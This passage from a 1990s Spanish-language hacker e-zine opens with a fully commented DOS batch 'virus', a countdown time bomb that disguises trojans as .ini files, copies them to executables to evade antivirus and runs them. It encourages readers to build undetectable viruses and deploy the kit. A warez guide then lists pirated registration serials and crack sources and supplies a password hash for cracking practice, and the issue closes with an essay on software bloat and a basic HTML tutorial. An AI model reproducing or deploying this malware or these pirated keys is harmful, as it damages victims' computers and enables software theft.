 El codigo que viene en la revista incluye un troya con una grafica malisima
 (sysinis.ini) y el puro troya en caso de fallar el otro (bakbmb.ini). Algun
 otro tipo de kaoz seria copiar un virus a uno de los dos archivos ya que
 no es necesario que los dos esten presentes.

 CODIGO BASE
 Las lineas que empiecen con ~@~ son comentarios por si acaso quieres
 modificar el codigo y eliminar la necesidad de borrar el userz1.dat para
 que empieze el conteo.

----------Comienza bye bye virii por raregazz-----CHKSYS.BAT------------------
@echo off
~@~ borra el input del prompt
if exist c:\windows\countdw.001 goto menos1
~@~ revisa si existe el archivo countdw.001 si es asi, brinca a menos1
if exist c:\windows\countdw.002 goto menos2
~@~ revisa si existe el archivo countdw.002 si es asi, brinca a menos2
if exist c:\windows\countdw.003 goto menos3
~@~ revisa si existe el archivo countdw.003 si es asi, brinca a menos3
if exist c:\windows\countdw.004 goto menos4
~@~ revisa si existe el archivo countdw.004 si es asi, brinca a menos4
if exist c:\windows\countdw.005 goto menos5
~@~ revisa si existe el archivo countdw.005 si es asi, brinca a menos5
if exist c:\windows\countdw.006 goto menos6
~@~ revisa si existe el archivo countdw.006 si es asi, brinca a menos6
if exist c:\windows\countdw.007 goto byebye
~@~ revisa si existe el archivo countdw.007 si es asi, brinca a byebye
if not exist c:\windows\userz1.dat goto explode
~@~ si no existe c:\windows\userz1.dat brinca a explode
goto end
~@~ si encuentra a c:\windows\userz1.dat brinca al final
~@~ para hacer al virus una bomba de tiempo remueve las dos ultimas lineas
~@~ dejando el comando "goto explode" despues de revisar el countdw.007
:byebye
~@~ esta es la rutina destructiva!
if not exist c:\windows\sysinis.ini goto nobomb
~@~ si no existe c:\windows\sysinis (el troya#1) brinca a nobomb
copy c:\windows\sysinis.ini c:\windows\bye.exe /y >nul
~@~ copia el sysinis.ini a un ejecutable. Hace esto para evitar que algun
~@~ antivirus revise el troya aunque hasta la fecha el incluido por default
~@~ no es detectado.
del c:\windows\countdw.007 >nul
~@~ borra el archivo countdw.007
c:\windows\bye.exe help
~@~ ejecuta el archivo bye.exe alterado con HACKCOM *del programa kaos* para
~@~ ejecutarse normalmente (grafica) y como tiene la clave help despues el
~@~ otro programa 'pegado' (troya).
:nobomb
~@~ en caso de no encontrar c:\windows\sysinis.ini cae aqui el control.
if not exist c:\windows\bakbmb.ini goto kill
~@~ si no existe el otro troya brinca a kill :-(
copy c:\windows\bakbmb.ini c:\windows\bye2.com /y >nul
~@~ copia el bakbmb.ini a bye2.com (troya#2)
c:\windows\bye2.com
~@~ ejecuta el troya#2
cls
echo.
echo  Bye Bye virus... por RareGaZz
echo  http://www.geocities.com/Baja/4426
echo.
pause
goto kill
~@~ brinca a Kill
:kill
~@~ aqui se borran las huellas del virus (en caso de ser virus y no troya los
~@~ archivos ejecutados o tal vez solo una grafica.
del c:\windows\after.bat >nul
del c:\windows\bakbmb.ini >nul
del c:\windows\sysinis.ini >nul
goto end
~@~ brinca al final del virus.
:menos6
~@~ si encuentra el archivo countdw.006 lo copia a c:\windows\countdw.007
~@~ y elimina el anterior.
copy c:\windows\countdw.006 c:\windows\countdw.007 /y >nul
del c:\windows\countdw.006
goto end
:menos5
~@~ si encuentra el archivo countdw.005 lo copia a c:\windows\countdw.006
~@~ y elimina el anterior.
copy c:\windows\countdw.005 c:\windows\countdw.006 /y >nul
del c:\windows\countdw.005 >nul
goto end
:menos4
~@~ si encuentra el archivo countdw.004 lo copia a c:\windows\countdw.005
~@~ y elimina el anterior.
copy c:\windows\countdw.004 c:\windows\countdw.005 /y >nul
del c:\windows\countdw.004 >nul
goto end
:menos3
~@~ si encuentra el archivo countdw.003 lo copia a c:\windows\countdw.004
~@~ y elimina el anterior.
copy c:\windows\countdw.003 c:\windows\countdw.004 /y >nul
del c:\windows\countdw.003 >nul
goto end
:menos2
~@~ si encuentra el archivo countdw.002 lo copia a c:\windows\countdw.003
~@~ y elimina el anterior.
copy c:\windows\countdw.002 c:\windows\countdw.003 /y >nul
del c:\windows\countdw.002 >nul
goto end
:menos1
~@~ si encuentra el archivo countdw.001 lo copia a c:\windows\countdw.002
~@~ y elimina el anterior.
copy c:\windows\countdw.001 c:\windows\countdw.002 /y >nul
del c:\windows\countdw.001 >nul
goto end
:explode
~@~ rutina que al no encontrar c:\windows\userz1.dat empieza el conteo.
if not exist c:\windows\win.com goto kill2
~@~ si no existe c:\windows\win.com brinca a kill2
copy c:\windows\win.com c:\windows\countdw.001 /y >nul
goto end
:kill2
~@~ elima el virus del sistema.
del c:\windows\winstart.bat >nul
del c:\windows\sysinis.bat >nul
del c:\windows\bakbmb.ini >nul
:end
~@~ la ultima rutina.
if exist c:\windows\after.bat call c:\windows\after.bat
~@~ busca a after.bat si existe lo ejecuta.
----------FIN del bye bye virii por raregazz-----CHKSYS.BAT-------------------

 Espero le hayas entendido al codigo del virus, crea uno tu mismo y veras lo
 facil que es hacer virus efectivos y dificiles de detectar. Si usas el
 ejemplo contenido en el archivo adjunto a la revista (virii.zip) copia algun
 demo o programa no daino a los archivos c:\windows\sysinis.ini y
 c:\windows\bakbmb.ini para que veas por tu mismo la efectividad del virus.
 Descomprime virii.zip y corre install.bat en una pc y cuando quieras empezar
 el conteo borra c:\windows\userz1.dat

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                              R3v1S10/\/ D3 W4R32
                               por Siskel&Ebert

 A muchos nos gusta atiborrar nuestro espacio en disco para tener las mejores
 cosas que podamos conseguir en internet aunque casi siempre terminamos
 guardando programas que nunca volveremos a utilizar pero no los borramos por
 el temor de necesitarlos en cuanto uno de los clusters del archivo borrado
 sea ocupado por otro.
 Para que ustedes tengan una idea del warez que pueden conseguir en internet
 que peca de no estorbar me he puesto a escribir una guia de software
 inspirado en la guia para internet que aparecio en el numero 2
 Para encontrar los programas usa los servicios de www.shareware.com
 o www.download.com aunque tambien podrias buscar el archivo por el nombre
 del programa en alguna maquina de busqueda.

 [ Despues de algun tiempo de busqueda (aprox. 15 minutos) RareGaZz pone a su
   entera disposicion TODOS los programas mencionados en este articulo en la
   pagina oficial del MagaZine... CkSmkr  ]

                                >-ENCRIPCION-<

 PGP
 ~~~
 El mejor programa de encripcion de archivos que puedan tener. La encripcion
 se basa en la tecnica de las llaves publicas y como ya fue ampliamente
 revisado en esta revista ahi la dejamos.

 PGPFONE 1.0b2
 ~~~~~~~~~~~~~
 Programa para conversaciones por telefono seguras. Ya lo he utilizado un par
 de veces y nada es mas gracioso que usar este programa, te pones los
 audifonos de tu tarjeta de sonido conectas el microfono y si tu tarjeta no
 es "full duplex" terminaras usando el telefono como un radio cb. Imagina una
 conversacion tipica con pgpfone:
 - watz up! tienes algun nuevo warez? cambio
 - simon me acaba de llegar el office 97!! cambio
 - a toda eme cuando puedo pasar por el? cambio
 - maana a las dos en punto donde siempre... cambio y fuera.

 Blowfish Advanced 95
 ~~~~~~~~~~~~~~~~~~~~
 Mejor programa para encripcion basada en claves no podran encontrar! Tiene
 muchisimas opciones para todos los paranoicos haya fuera. En este programa
 encontraras mas algoritmos que en tu libro de matematicas ademas tiene un
 feature especial llamado TEMPEST que permite escribir la clave sin temor
 a ser capturada por espias internacionales :))) si eliges la opcion tempest
 tu teclado producira 'ruido' y la pantalla se vera como una disco de tijuas
 a las 4 de la maana.
 Los algoritmos que puedes usar para encriptar son :
 - Blowfish
 - Blowfish 32
 - GOST
 - Triple DES
 - Cobra
 - IDEA  [ La version mas nueva no lo tiene disponible ]
 Despues de encriptar puedes usar una de las tantas opciones de wiping que
 incluye SFS wiping (un tipo de eliminado de archivos) y otras. Tambien puedes
 usar mixed encription por si quieres usar dos algoritmos para encriptar tus
 archivos [ ya no disponible ] y si lo deseas cuenta con una opcion que si la
 eliges renombra todos los archivos encriptados con nombres totalmente
 insignificantes. Tiene muchas opciones por eso es imposible explicarlas todas
 en este texto lo malo es que la version shareware unicamente permite claves
 de 4 digitos por lo que el archivo necesario para registrarlo viene incluido
 en esta revista :)


[ Despues de leer este texto busque el programa y me encontre con una version
  mas nueva y no aparece el algoritmo IDEA -usado en pgp- ni el `feature' ese
  de mixed encription asi que como buen hacker investigue...

  From: raregazz@bigfoot.com
  To: tis5maha@rz.fht-esslingen.de
  Subject: encription...

>Why do you remove de double encryption routine?? That was the most hype
>thing in your program and in version 82e is gone...along with IDEA.
>It seems to me your program is getting better in design but worse in
>security. Or may be am wrong, can you please tell me what was the error
>in the double encription scheme? I need to know because I am still using
>version 81a that seems to be more powerful and I need to know if the
>encription am using is "secure" with the double encription thingie.

 From: tis5maha@rz.fht-esslingen.de
 To: raregazz@bigfoot.com
 Subject: Re: encription...

>IDEA was removed due to license problems, but it will return in BFA97
>as a free driver which you can add to the application.
>Double encryption was removed because it was futile. Sounds strange,
>but one can prove it with the so-called "meet-in-the-middle" attack that
>double encryption just increases the keyspace to one bit. Although the
>attack is more or less just a mathematical thing (one will need megatons of
>memory and computer power) I decided to remove this feature, because you'll
>never know if someone has exploited that attack to work more efficiently.
>The new UCDI concept in BFA97 will enable programmers to design their
>own drivers as they like it (e.g. write a triple encryption driver with
>a Blowfish-IDEA combination).
>
>Markus

 un agradecimiento al creador del programa por explicarme la razon de haber
 eliminado en su mas reciente version algunas features de su programa. Al
 parecer en verdad esta interesado en mantener fuerte y sin vulnerabilidades
 su pieza de software Blowfish Advanced. CkSmkr]

 Puffer
 ~~~~~~
 No tan bueno como el anterior pero mas facil de usar para encriptar mensajes
 de email si las personas que se comunican saben la clave de desencriptado.
 Tiene varias desventajas (usa solo blowfish) pero es una buena opcion para
 los usuarios de windows 3.1 con una linea de comunicacion segura donde
 puedan pasarse la clave (telefono). Tiene la opcion de limpiar el espacio
 vacio del disco que parece no funcionar con windows 95.
  [ blowfish advanced 95 tambien tiene esta opcion y si funciona con win95 ]


                                >-ACCESORIOS-<

 Powertoys
 ~~~~~~~~~
 Son unas herramientas de microsoft que realizan distintas cosas, yo no les
 recomendaria instalar todas pero si deskmenu y tweak UI. Deskmenu es un icono
 en la barra de tareas que al ser presionado despliega un menu con los
 contenidos del escritorio. Tweak UI tiene muchisimas opciones asi como
 tambien settings de 'paranoia'. Para instalar se descomprime powertoys en un
 directorio temporal y se hace doble click en los archivos .inf del programa
 que se quiera instalar.

 AniDesk
 ~~~~~~~
 Utileria 100% estetica para nuestro escritorio. Una vez ejecutada pone en
 la pantalla un icono animado y hace que el escritorio se vea comico.
 contiene varios iconos como la tierra, una hamburguesa y varios mas aunque
 tambien puedes crear los propios.

 WINZIP 6.3 32bits
 ~~~~~~~~~~~~~~~~~
 La mejor compresion de datos con la capacidad de guardar archivos con
 nombres largos y crear autoexecutables para windows 95. Los botones son unas
 graciosas graficas en 3D. Sin duda el mejor programa de compresion.
 Disponible en www.winzip.com y el codigo de registro esta en los numeros
 anteriores de la revista.

 PureVoice -Qualcomm-
 ~~~~~~~~~~~~~~~~~~~~
 De los creadores de Eudora sale este programa que nos permite enviar y
 recibir mails con voz clara y de poco tamao. Un mensaje de unos 300k podria
 mandar hasta 5 minutos de voz continua. Tiene dos tipos de voz, la de mas
 alta calidad ocupa 13k por segundo y la otra de menor calidad 8k por segundo.
          [ puedes enviar correo a raregazz usando este programa :) ]

 RegClean
 ~~~~~~~~
 Un casi excelente limpiador de nuestro registro de windows 95 que acelera
 el tiempo necesario para iniciar nuestra computadora. Tiene algunos errores
 por ejemplo cuando ponemos en nuestros folders el "auto arrange" despues de
 ejecutar esta utilidad esta opcion se desabilita.

 MapEdit
 ~~~~~~~
 Con este programa los mapas graficos para archivos HTML son faciles de hacer
 y sin conocimiento del lenguaje hyper text markup languaje. Se maneja con
 figuras geometricas y el codigo generado se copia al clipboard y despues
 se tiene que pegar al archivo HTML o el programa lo genera.
 serial number: BJJNBKBA

                                   >-AUDIO-<

 Cool Edit 96
 ~~~~~~~~~~~~
 Esta programa es especial para usar y editar archivos de audio. Tiene filtros
 reductores de ruido y efectos especiales como marcianos, tuneles y radio. Con
 el programa shareware unicamente se puede elegir entre un efecto de muchos
 pero el codigo de registro es:
           name: raregazz                          name: cooldude
         serial: XHMXJUIB                        serial: LWGLJZRP
 Quiero agradecer a camelo por pasarme este programa :-O

 RealPlayer
 ~~~~~~~~~~
 Un plugin para tu browser que te permitira escuchar sonido en linea
 rapidamente y tambien video. Las versiones light son gratuitas y las puedes
 conseguir en www.real.com y/o www.realplayer.com

                                 >-GRAFICOS-<

 LviewPro
 ~~~~~~~~
 Programa para ver graficos de distintos formatos. Tiene tambien muchos
 filtros que sirven para agregar distintos efectos a las imagenes como el blur
 y tambien suaviza la imagen en caso de ser esta de baja calidad.
 Con este programa puedes crear slideshows del numero de graficas que quieras
 y tambien en una pantalla puedes poner un preview de todas las graficas que
 tu quieras. Todo esto desde el menu file-multiple open.
 El codigo de registro esta en el primer numero de la revista.

 MicroAngelo 95
 ~~~~~~~~~~~~~~~
 Si necesitas editar o crear tu propio icono animado para windows 95 (.ani)
 o un icono normal (.ico) este programa te permite hacerlo. Hay dos versiones
 de este programa en internet y una no permite la creacion de iconos animados.
 El crack esta en los numeros pasados de la revista.

 Microsoft Gif Animator
 ~~~~~~~~~~~~~~~~~~~~~~
 Un simple animador de imagenes gif89 tipo cuadro por cuadro. Lo util de este
 programa es la capacidad de pasar del formato avi al gif las animaciones. No
 tiene ninguna otra opcion y es gratuito. Lo puedes encontrar en
 www.microsoft.com

 Morpher for Windows 1.2
 ~~~~~~~~~~~~~~~~~~~~~~~
 Este programa es un poco complicado pero una ves entendiendo su manejo es
 facil crear el efecto morphing de dos imagenes bmp. vienen dos ejemplos
 bastante impresionantes que sirven de base para tus trabajos. El programa
 funciona con windows 3.1 y windows 95. Codigo de registro:
 Name: (cualquier nombre)
 Code: 97044

 Ulead Gif Animator 1.5
 ~~~~~~~~~~~~~~~~~~~~~~
 Este animador de GIF's deja atras a la competencia ofreciendo varios efectos
 para las animaciones que valen la pena un vistazo! Tambien puede importar
 animaciones avi's y aadirle efectos como persianas, morphing y algunos
 otros. El periodo de prueba es de 15 dias y aun no tengo el crack :(

 ACIDDRAW 1.2
 ~~~~~~~~~~~~
 Un programa de dibujo ANSI/ASCII que permite crear y editar archivos graficos
 COM, ANSI, ASCII, BINARIOS, PASCAL, C, PCBOARD, y ASM.
 Los menus de edicion de graficos son faciles de entender y tambien hay una
 utilidad llamada AcidView para ver los archivos que este programa genera y
 los graficos como jpg y gif.

                                 >-INTERNET-<

 HomeSite
 ~~~~~~~~
 Este programa permite la creacion de paginas web como si se tratara de un
 editor de textos comun. No es necesario el conocimiento del HTML pero algunas
 cosas como la creacion de mapas graficos resultan complicadas usando este
 programa. www.allaire.com

 Name: Siskel&Ebert         Name: RareGaZz
 Code: 239624079488         Code: 319539881279

                                   >-HACKS-<

 John the ripper 1.3 Alpha 3 (DOS)
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 El mejor cracker disponible para computadoras pentium. Es rapidisimo y no
 son necesarias las listas de palabras para su funcionamiento ya que tiene
 un feature llamado "incremental generator" que si editamos el archivo
 john.ini podemos hacer un ataque bruto probando todos los caracteres de
 cierto numero de caracteres [ ??? ]
 Si quieres probar el funcionamiento de tu cracker mide el tiempo que se
 tarda en quebrar el siguiente password:

                             micuenta:KkhJDtJd.gERE:
                         -el password encriptado es raul-
  [ esto es lo mas cerca que mucha gente estara de un /etc/shadow ! >:) ]

 XiT
 ~~~
 Otro cracker para DOS pero muchisimo mas lento que john the ripper. Tiene
 pocas features y es bueno unicamente para las 386's o peores...

 Hackers Utility v1.02
 ~~~~~~~~~~~~~~~~~~~~~
 La mejor utileria para hackers que hasta ahora haya visto. Junto con el
 programa vienen serial numbers, funciones del sistema como shutdown, log off
 y muchas otras para windows NT. Tambien tiene incluidas como herramientas un
 cracker de unix mas rapido que cracker jack y un rapidisimo cracker de
 archivos comprimidos zips. Tiene tambien utilerias de red como finger, un
 scanner de puertos I.P y muchas otras cosas. Este programa merece 5
 estrellitas en la frente (o sus autores).
  [ no esta disponible en la pagina web :( por que no lo encontre. cksmkr ]

 WinHacker 95
 ~~~~~~~~~~~~
 Un hacker personal para windows 95. Tiene muchas opciones disponibles pero
 la mas significativa es la capacidad que tiene el programa de cambiar el
 nombre de la persona y la compaia a la que esta registrado windows.
 Tambien puede remover la pantalla de inicio de windows 95 y puede configurar
 tu sistema win95 para que inicie en prompt DOS.

                                  >-FINALE-<

 Abur se cuidan y no coman tierra.

        = la mayoria de los hacks los saque de www.astalavista.com =

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                                Exceso Digital

  Recientemente me he visto forzado a buscar nuevo software y hardware
  desde que empeze a sufrir la indignidad de actualizar mi sistema. No puedo
  creer que los productores han avanzado tan salvajemente mientras yo no
  estaba viendo - la complejidad esta fuera de control.
  He pasado mucho tiempo frente a las computadoras en los aos pasados. La
  gente a hecho chistes acerca de mi dependencia al email y toda mi familia
  me recuerda usando una laptop desde mis primeros dias en preparatoria.
  Pero las computadoras pueden ser como botas de eskiar. Las viejas tienden
  a mantenerse eficientes, comprar unas nuevas significa dolor de pies. Asi
  que yo estoy chapado a la antigua en computadoras. Ni siquiera uso un
  programa de email sino que lo leo y mando desde mi adorable terminal UNIX.
  Pero inevitablemente llega un tiempo en que esas botas de piel favoritas
  tienen que ser cambiadas por un nuevo par. Ese tiempo me llego en los
  primeros dias de 1997 y los nuevos dolores de cabeza digitales que he
  descubierto aun no se han calmado. Para mi suerte cuento con la ayuda
  de unos de los mejores en el terreno de las computadoras, los llamados
  "power users" me pregunto que es lo que hace la sociedad en general cuando
  necesitan  ayuda ?

  Software excesivo

  El problema radica en el tipo de software que usamos, lleno de "features"
  y cositas que hacen explotar en tamao a los nuevos sistemas. Soy propenso
  a quejarme cada vez que Andy (intel) crea un procesador mas rapido Bill
  (microsoft) usa mas de el. Resulta ser no tan gracioso. Simplemente hecha
  un vistazo a la complejidad del Word de microsoft mas reciente. Es
  simplemente increible, y cada nueva version se esta poniendo peor. Ha
  llegado el punto en que la mayoria de los programas son inservibles y se
  ejecutan mas lento que como lo hacian una decada atras.  Que esta mal con
  el chico de Redmond Mr. Microsoft ? Quizas aprenda algo de la facilidad de
  uso de su nueva compra:  WebTV.
  Mi vida adulta y profesional se basa en intentar hacer a las computadoras
  mas faciles de usar. En el ao de 1965 las personas pensaban que solo los
  maricas necesitaban graficas. En 1972, cuando gastabamos 256k guardando
  imagenes la gente lo veia como una indecencia y arrogancia.
  Por que alguien utilizaria tanta harina en la cubierta y no en el relleno?

  Tres decadas despues encontramos una generacion de nios que no cuenta la
  memoria en k's sino en m's (y proximamente en G's). Esto es maravilloso,
  pero fijense en lo que utilizamos esa memoria!! La interfaz no ha cambiado
  radicalmente desde la introduccion de la Macintosh mas de una decada atras.
  Es solo mas dificil de usar y obsesivamente compleja. Alguien necesita un
  reloj despertador.
  Como un devoto de las Macintosh con suficientes de ellas en mi closet, me
  encuentro actualmente frustrado con los ultimos modelos. La pequea cara
  que nos recibia en el inicio de nuestras sesiones se a vuelto tan compleja
  que una Mac no es mas facil de usar que una Wintel. Asi, como muchos otros,
  decidi que era tiempo de cambiar de plataforma.
  Hice mi primera entrada con Windows hace un mes o dos y quede tan apaleado
  que regrese corriendo a mi Mac como alguien que regresa al camion despues
  de probar el nuevo tren subterraneo. Me sorprendio que mucha gente usara
  windows 95 sin quejas y supongo eso se debe POR QUE NO HAY ALTERNATIVA.

  Ni PC o NC, sino SC

  La gente me pregunta con frecuencia que opino de la NC (Network Computer),
  una idea de la gente de Oracle que se basa en una terminal casera con un
  drive removible y todos mis datos en algun servidor lejos de mi alcance.
  Bill Gates viendo esto como una amenaza a su imperio a lanzado ya su
  terminal Windows para la NC, una vez mas el mal predomina.
  El hecho triste es que NC o PC, las dos, estan terriblemente mal. Pero tu
  y yo no tenemos alternativa.
  El mundo no necesita una PC o NC sino una SC (scalable computer) que seria
  una maquina modular que fuera tan simple como el pay (y sin costar mucho
  mas) y que tenga la capacidad de crecer de una simple editora de textos a
  una supercomputadora. Personalmente estoy decidido a permanecer en el punto
  mas bajo de la escala.
  Por que? pues por que no hay cupo para Windows 95 en Africa. Muchas otras
  partes del mundo tambien necesitan equipo facil de conseguir y manejar.
  Siempre pense que este era un problema diferente al que me preocupaba a mi
  pero repentinamente abri los ojos y me di cuenta que mi problema no es mucho
  mas distinto al de un pakistani tratando de manejar su primera computadora
  sin importar que yo tuviera talento a mi dispocision y recursos. Las
  computadoras hoy en dia son terriblemente dificiles de usar.

  Que otra cosa podemos hacer aparte de quejarnos? es tiempo de una huelga por
  los usuarios de computadoras? claro que si. Cualquier persona que este
  creando los sistemas del maana debe poner los pies en la tierra y darse
  cuenta que las aplicaciones del maana necesitan ser aplicaciones faciles
  de usar con operaciones sencillas. Necesitan dejar de hacer software con
  opciones sofocantes que son creados por genios para genios.  por que no
  intentar hacer algo para el resto de nosotros ?

  Una solucion por el momento seria recomendar a los principiantes a usar
  un servicio en linea para entrar a internet como AT&T WorldNet (mexico).Pero
  cuando trate de instalarlo yo mismo las primeras palabras del instructivo
  decian "Apague la proteccion del software para virus usando el extensions
  manager"  QUE DIABLOS SIGNIFICA ESO PARA PAPA Y MAMA ? Despues, como era
  predecible, el instalador causo un crash en mi sistema.

 NiK

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<


                    ServerHacker Productions(c) Presenta...
                               *****************
                                     HTML
                                 Para Mortales
                               *****************
                      Creado exclusivamente para RareGaZz

 HiApAlZ  a ver si logro hacerlos entender el HTML a los que no saben como
 hacer sus paginas para la red. A lo mejor luego hago otro texto sobre esto y
 despues prometo escribir una guia para poder poner una pagina gratuita en la
 red. Mientras tanto si ya saben de html mejor brinquense este monton de *%#&
 por que se les puede hacer shitty :(

                                 EL PRINCIPIO

 Lo primero es conseguir un editor de textos para hacer los archivos HTML.
 notepad de windows funciona bien aunque tambien aguanta vi de unix. si usas
 un procesador DOS para los HTML algunas letras no se podran ver bien en el
 navegador.
 Los comandos que el navegador interpreta se ponen en medio de los caracteres
 <  >. Si algun comando no lo entiende aparecera en el documento tal y como
 esta en el texto incluyendo los < >.
 Voy a darles un ejemplo para que vean como esta la cosa con los comandos de
 este rollo. vamos a suponer que necesitamos que aparezca la palabra "ESTO"
 en letras italicas; el comando es <i> y se usaria asi:
                            ES <i>ESTO</i> OTRA PALABRA
 Para evitar que las siguientes palabras tambien se vean italicas se debe
 marcar el final del comando con la diagonal  /  seguida del comando usado
 como se ve en el ejemplo. la mayoria de los comandos deben terminar como se
 muestra en el ejemplo.

                               COMANDOS BASICOS

 Al iniciar nuestro documento HTML el primer comando que debemos poner en el
 archivo es <HTML> (tambien debe terminar al final del archivo con </HTML>).
 esto le dice al navegador que se trata de un hypertexto. seguido del comando
 inicial html se debe definir el encabezado de la pagina o header, el header
 es el texto que aparece en la barra superior del navegador cuando entramos a
 una pagina y tambien es lo que se queda registrado en el bookmark de un
 navegador.
 El encabezado se define con el comando <HEAD> y termina </HEAD>.Muchas veces
 es usado el comando <TITLE> despues de head para definir el titulo y debe ser
 terminado asi </TITLE> antes de terminar el encabezado. Despues sigue el
 cuerpo del documento y este se define con el tag <BODY> este es el ultimo
 comando para definir nuestro documento. cuando el body se pone todo lo que se
 escriba abajo de el sera mostrado en el navegador. Ahora veremos un ejemplo
 sobre lo que trato de explicar.

 <html><head><title>Mi primera pagina</title>
 </head><body> Esto es un Test </body></html>

 Esos simples codigos haran que aparezca en el visualizador (noten que por
 fin se me ocurrio un sinonimo) un doc que dira "Esto es un Test" con el
 titulo en la barra superior "Mi primera pagina". Vamos apenas empezando...

 Con el comando <BODY> podemos decirle al visualizador el color de las letras
 de nuestro documento y sobre que fondo deben estar tambien si queremos una
 grafica como background -cajum..fondo- ahi tenemos que indicarlo. El color de
 los links, de los links ya seguidos y de los links activos como los de email
 tambien se pueden definir en el mismo tag <BODY> usando los parametros que
 tratare de explicarles.

 LINK="#000000"
 El parametro link define el color de los links que aparezcan en el doc.

 VLINK="#000000"
 De este color seran los links que ya hayan sido seguidos por ese navegador.

 BGCOLOR="#ffffff"
 Aqui se escribe el color del fondo de la pagina.

 BACKGROUND="grafica.gif"
 Si quieres una grafica como fondo asi lo escribes.

 TEXT="#000080"
 El color del texto.

 ALINK="#0000FF"
 El color de los links activos.

 Los colores son escritos en valores hexadecimales y si usamos los parametros
 estos el tag BODY quedaria asi:

<BODY LINK="#000000" VLINK="#000000" BGCOLOR="#ffffff" BACKGROUND="grafica.gif" TEXT="#000080" ALINK="#0000FF">

                             COMANDOS ADICIONALES

 Sonidos
 ~~~~~~~
 Despues de la etiqueta BODY podria usarse esta linea para hacer sonar un
 midi en nuestro documento como fondo. El comando es <BGSOUND> ejemplo:

                   <BGSOUND SRC="algun.mid" LOOP=INFINITE>
                  ( este comando NO termina con </BGSOUND> )

 Otra forma de incluir musica para los visualizadores que no toquen los midis
 con el comando anterior es:

                  <embed src="algun.mid" autostart="true">

 El parametro autostart="true" podria ser autostart="false" para permitir que
 la persona que vea nuestro documento active el sonido por su cuenta. Al
 igual que el otro comando para la musica este tampoco requiere el comando
 adicional con la diagonal.

 Presentacion
 ~~~~~~~~~~~~
 <BLINK>
        Este es uno de los comandos mas inutiles de netscape y para lo que
        sirve es para hacer que algo centellee pero como todos los relojes de
        las computadoras van a distinta velocidad este tag a veces pasa sin
        que sea notado.

 <H1>
      Este comando sirve para hacer los titulos o encabezados de algun tema
      a tratar. Usando el tag <H1> el texto que este entre ese comando sera
      de tamao grande y bold. Ejemplo: <h1> hola </h1>

 <H2>
      Lo mismo que el anterior solo que mas pequeo.

 <H3>
      Aun mas pequeo.

 <HR size=?>
              El comando <HR> pone una linea horizontal en el visualizador
              que sirve para dividir los contenidos de alguna pagina. Si se
              le agrega el parametro size= se puede cambiar el grosor de la
              linea.

 <FONT SIZE=?>
              Cuando se quiera cambiar el tamao de la letra se usa este tag
              de html reciente. El texto entre el tag <font size=3> </font>
              sera de tamao 3. Todos los comandos fonts deben terminar con
              el comando </font> incluyendo el siguiente.

 <FONT COLOR=?>
              Cambia el color de los caracteres entre el tag <font color=red>
              y </font>. Los colores se especifican por sus nombres en ingles.

 <B>
    Este comando pone <b> BOLD </b> el texto entre los tags.

 <I>
    Para poner <i> italicas </i> un texto o palabra usa este comando.

 <U>
    Si quieres <u> subrayar </u> algo importante.

 Ejemplo General:

  <font size=3><font color=blue><b><i><u> HOLA!! </u></i></b></font></font>

  Los comandos pueden ser juntados para crear mejores efectos pero siempre
  termina el comando correctamente para no modificar el texto sobrante.

 Espaciado
 ~~~~~~~~~

 <BR>
     Se usa cuando se quiere pasar un espacio en el documento.No requiere
     usarse la diagonal para terminarlo.

 <P>
    Marca el fin de un parrafo. Tampoco es necesario terminarse con la
    diagonal.

 Forms
 ~~~~~
 Las formas se definen con los comandos <form> y </form>. Son incluidos cuando
 queremos feedback o respuestas de los visitantes de una pagina. En medio de
 estas etiquetas existen otros tags que funcionan para dar formato a la forma
 en que seran insertados los datos. Estas son: <select>, <textarea> e <input>.
 Los atributos que le corresponden a la etiqueta o tag <form> son: METHOD y
 ACTION.
 El atributo METHOD especifica la manera en que el visualizador enviara la
 informacion al servidor valiendose de dos auxiliares que son GET y POST.
 El atributo ACTION dice hacia donde se deberan enviar los datos obtenidos por
 la forma, las formas mas comunes son por medio de un script CGI o tambien
 hacia una direccion de correo especificandola con la etiqueta MAILTO como en
 el ejemplo siguiente:
 <FORM METHOD="POST" ACTION=MAILTO:midireccion@decorreo.net>

 <TEXTAREA> Esta etiqueta permite una entrada libre al usuario ofreciendose
 como un campo para comentarios. Tiene 3 atributos que definen como sera
 esta area de texto: name, rows y cols.
 name especifica el nombre del campo de texto.
 rows especifica el numero de lineas de texto.
 cols especifica el numero de columnas del area.
 Un ejemplo de esta etiqueta es:
 <textarea name="comentarios" rows="8" cols="40">
 Comentarios...</textarea>

 <INPUT> Esta es una de las etiquetas mas usadas en las formas ya que tiene
 distintos formatos como simples lineas de texto, botones de radio y las
 cajas de marca.
 La etiqueta a usar para simples lineas de texto como nombres y direcciones
 de correo electronico es: TEXT. type="text" se usa para mostrar una linea
 de texto. Se puede eligir el numero maximo de caracteres y su longitud con
 size y maxlength. Este es un ejemplo de TEXT:

 Nombre:<input type="text" name="nombre" size=50 maxlength=50><br>
 Edad:<input type="text" name="edad" size=15 maxlength=10><br>

 CHECKBOXES Los checkboxes son utiles en ocasiones cuando las preguntas no son
 de opcion libre sino que las respuestas estan predeterminadas por el creador
 de la forma y pueden ser escogidos 2 o mas campos. Ejemplo:

 Selecciona una opcion:<br>
 <input type="checkbox" name="opcion" value="uno">Uno
 <input type="checkbox" name="opcion" value="dos">Dos
 <input type="checkbox" name="opcion" value="tres">Tres<p>

 RADIO BUTTONS Los botones de radio a diferencia de los checkboxes unicamente
 es posible elegir uno de ellos de cierto campo.

 Selecciona una opcion:<br>
 <input type="radio" name="opcion" value="uno">Uno
 <input type="radio" name="opcion" value="dos">Dos
 <input type="radio" name="opcion" value="tres">Tres<p>

 RESET Si se comete algun error a la hora de llenar la forma se utiliza este
 elemento para borrar todos los campos. He aqui un ejemplo:

 <input type="reset" value="Limpiar la forma y empezar de nuevo">

